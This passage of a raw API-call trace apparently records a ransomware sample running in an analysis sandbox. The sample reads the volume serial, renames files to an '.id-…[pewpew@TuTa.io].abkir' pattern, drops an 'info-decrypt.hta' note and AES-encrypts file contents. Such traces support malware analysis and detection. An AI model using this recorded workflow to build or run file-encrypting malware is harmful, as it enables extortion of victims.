pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0184.865] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0184.875] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5bd84) returned 0x0 [0184.876] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5bd64) returned 0x0 [0184.876] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603331c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.876] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0184.876] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0184.876] CoTaskMemFree (pv=0xbd4a38) [0184.876] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x0 [0184.877] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5bd84) returned 0x0 [0184.877] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0184.878] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0184.893] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0184.893] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0185.134] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0185.137] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5bce4) returned 0x0 [0185.137] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.137] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0185.137] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0185.137] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0185.137] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5bd6c) returned 0x0 [0185.137] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0185.137] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0185.137] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0185.137] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0185.137] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0185.137] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603331c) returned 0x0 [0185.137] WbemLocator:IUnknown:AddRef (This=0x603331c) returned 0x4 [0185.138] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x3 [0185.138] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x2 [0185.138] SysStringLen (param_1=0x0) returned 0x0 [0185.138] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0185.138] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0185.138] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.138] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0185.138] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0185.138] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5bd84) returned 0x0 [0185.138] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0185.138] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0185.138] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0185.138] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.138] IWbemServices:GetObject (in: This=0x603331c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028648, ppCallResult=0x0) returned 0x0 [0185.454] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0185.454] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0185.454] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.454] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b4670*=0, plFlavor=0x36b4674*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b4670*=8, plFlavor=0x36b4674*=0) returned 0x0 [0185.454] SysStringByteLen (bstr="9C354B42") returned 0x10 [0185.454] SysStringByteLen (bstr="9C354B42") returned 0x10 [0185.454] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b4670*=8, plFlavor=0x36b4674*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b4670*=8, plFlavor=0x36b4674*=0) returned 0x0 [0185.454] SysStringByteLen (bstr="9C354B42") returned 0x10 [0185.454] SysStringByteLen (bstr="9C354B42") returned 0x10 [0185.454] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", lpFilePart=0x0) returned 0x35 [0185.454] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0185.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0185.455] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x276f77e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0185.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0185.455] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0185.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", lpFilePart=0x0) returned 0x33 [0185.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0185.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0185.456] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0185.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0185.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", lpFilePart=0x0) returned 0x33 [0185.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0185.456] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), fInfoLevelId=0x0, lpFileInformation=0x36b4b98 | out: lpFileInformation=0x36b4b98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176)) returned 1 [0185.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0185.457] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", lpFilePart=0x0) returned 0x33 [0185.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0185.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0185.457] GetFileType (hFile=0x208) returned 0x1 [0185.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0185.457] GetFileType (hFile=0x208) returned 0x1 [0185.457] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4176 [0185.458] ReadFile (in: hFile=0x208, lpBuffer=0x3799ddc, nNumberOfBytesToRead=0x4176, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3799ddc*, lpNumberOfBytesRead=0x8f6eedc*=0x4176, lpOverlapped=0x0) returned 1 [0185.460] CloseHandle (hObject=0x208) returned 1 [0185.460] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe00b8) returned 1 [0185.461] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x379e618 | out: pbBuffer=0x379e618) returned 1 [0186.260] CryptImportKey (in: hProv=0xbe00b8, pbData=0x37cc558, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7ef90) returned 1 [0186.260] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.260] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.260] CryptDuplicateKey (in: hKey=0xb7ef90, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f750) returned 1 [0186.260] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.260] CryptSetKeyParam (hKey=0xb7f750, dwParam=0x4, pbData=0x37cc638*=0x1, dwFlags=0x0) returned 1 [0186.260] CryptSetKeyParam (hKey=0xb7f750, dwParam=0x1, pbData=0x37cc604, dwFlags=0x0) returned 1 [0186.260] CryptEncrypt (in: hKey=0xb7f750, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38c1ffc*, pdwDataLen=0x8f6eea8*=0x4180, dwBufLen=0x4180 | out: pbData=0x38c1ffc*, pdwDataLen=0x8f6eea8*=0x4180) returned 1 [0186.260] CryptEncrypt (in: hKey=0xb7f750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38c61a0*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x38c61a0*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0186.262] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0186.262] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0186.262] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0186.262] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", lpFilePart=0x0) returned 0x33 [0186.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0186.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0186.263] GetFileType (hFile=0x45c) returned 0x1 [0186.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0186.263] GetFileType (hFile=0x45c) returned 0x1 [0186.263] WriteFile (in: hFile=0x45c, lpBuffer=0x38c679c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x38c679c*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0186.264] CloseHandle (hObject=0x45c) returned 1 [0186.264] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0186.265] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0186.265] CoTaskMemFree (pv=0xbed438) [0186.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0186.265] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0186.265] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0186.265] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0186.265] IUnknown:Release (This=0xb51e34) returned 0x1 [0186.266] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027800) returned 0x0 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0186.267] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027800, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030e10) returned 0x0 [0186.267] WbemDefPath:IUnknown:Release (This=0x6027800) returned 0x0 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030e10) returned 0x0 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0186.267] WbemDefPath:IUnknown:AddRef (This=0x6030e10) returned 0x3 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbdeeb0) returned 0x0 [0186.267] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeeb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.267] WbemDefPath:IUnknown:Release (This=0xbdeeb0) returned 0x3 [0186.267] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0186.267] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0186.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0186.267] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x2 [0186.267] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x1 [0186.268] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0186.268] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0186.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e10, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030e10) returned 0x0 [0186.268] WbemDefPath:IUnknown:AddRef (This=0x6030e10) returned 0x3 [0186.268] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x2 [0186.268] WbemDefPath:IWbemPath:SetText (This=0x6030e10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x8f6edfc | out: 